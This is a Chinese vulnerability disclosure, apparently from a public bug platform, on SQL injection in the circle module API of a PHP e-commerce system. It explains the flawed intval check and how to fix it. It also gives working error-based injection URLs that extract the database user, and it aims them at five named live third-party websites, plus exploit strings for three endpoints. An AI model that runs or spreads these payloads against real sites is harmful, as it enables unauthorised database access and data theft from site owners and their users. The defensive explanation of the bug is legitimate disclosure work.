### 简要描述: 直接出数据 ### 详细说明: 先来五个互联网实例 ``` http://www.0795hui.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.hfmy.cc/modules/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://sn.atmbux.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://www.wbshyw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ``` http://o.yugongw.com/circle/index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#1 看到circle\control\api.php ``` public function get_theme_listOp() { $result = ''; $data_count = 2; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; } $model = Model(); $theme_list = $model->table('circle_theme')->field('*, is_recommend*rand()*10000 + has_affix*rand() as rand')->where(array('circle_status'=>1, 'is_closed'=>0))->where(array('has_affix'=>1))->order('rand desc')->limit($data_count)->select(); if(!empty($theme_list)){ $theme_list = array_under_reset($theme_list, 'theme_id'); $themeid_array = array_keys($theme_list); // 附件 $affix_list = $model->table('circle_affix')->where(array('theme_id'=>array('in', $themeid_array), 'affix_type'=>1))->group('theme_id')->select(); if(!empty($affix_list)) $affix_list = array_under_reset($affix_list, 'theme_id'); foreach ($theme_list as $key=>$val){ if(isset($affix_list[$val['theme_id']])) $theme_list[$key]['affix'] = themeImageUrl($affix_list[$val['theme_id']]['affix_filethumb']); } } if($this->data_type === 'json') { $result = json_encode($theme_list); } else { Tpl::output('theme_list', $theme_list); ob_start(); Tpl::showpage('api_theme_list', 'null_layout'); $result = 
ob_get_clean(); } $this->return_result($result); } ``` if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; } 这里存在很明显的逻辑错误：检查时用的是 intval($_GET['data_count'])，而 intval('1xxxx') 返回 1，可以通过 > 0 的判断；但随后赋给 $data_count 的却是未经转换的原始 $_GET 值，该值被直接拼入 limit 且没有单引号包裹，造成注入。修复方式是把 intval() 的结果（而不是原始输入）赋给 $data_count。 exp为 ``` index.php?act=api&op=get_theme_list&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#2 ``` public function get_reply_themelistOp() { $result = ''; $data_count = 3; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入2 } $model = Model(); $reply_themelist = $model->table('circle_theme')->where(array('is_closed'=>0))->order('theme_commentcount desc')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($reply_themelist); } else { Tpl::output('reply_themelist', $reply_themelist); ob_start(); Tpl::showpage('api_reply_themelist', 'null_layout'); $result = ob_get_clean(); } $this->return_result($result); } ``` exp为 ``` index.php?act=api&op=get_reply_themelist&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` 注入#3 ``` public function get_more_memberthemeOp(){ $result = ''; $data_count = 4; if(!empty($_GET['data_count']) && intval($_GET['data_count']) > 0) { $data_count = $_GET['data_count']; //注入3 } $model = Model(); $more_membertheme = $model->table('circle_member,circle_theme')->field('circle_member.*,circle_theme.*, circle_member.is_recommend*10000*rand()+(circle_member.cm_thcount)/10000 as rand') ->order('rand desc') ->join('inner')->on('circle_member.member_id = circle_theme.member_id and circle_member.circle_id = circle_theme.circle_id') ->group('circle_member.member_id,circle_member.circle_id')->limit($data_count)->select(); if($this->data_type === 'json') { $result = json_encode($more_membertheme); } else { Tpl::output("more_membertheme", $more_membertheme); ob_start(); Tpl::showpage('api_more_membertheme', 'null_layout'); $result = ob_get_clean(); 
$this->return_result($result); } } ``` exp为 ``` index.php?act=api&op=get_more_membertheme&data_count=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1) ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png" alt="QQ截图20150708225544.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/082258252e0d49d1cd139ff4c9f88ad0337d6eda.png)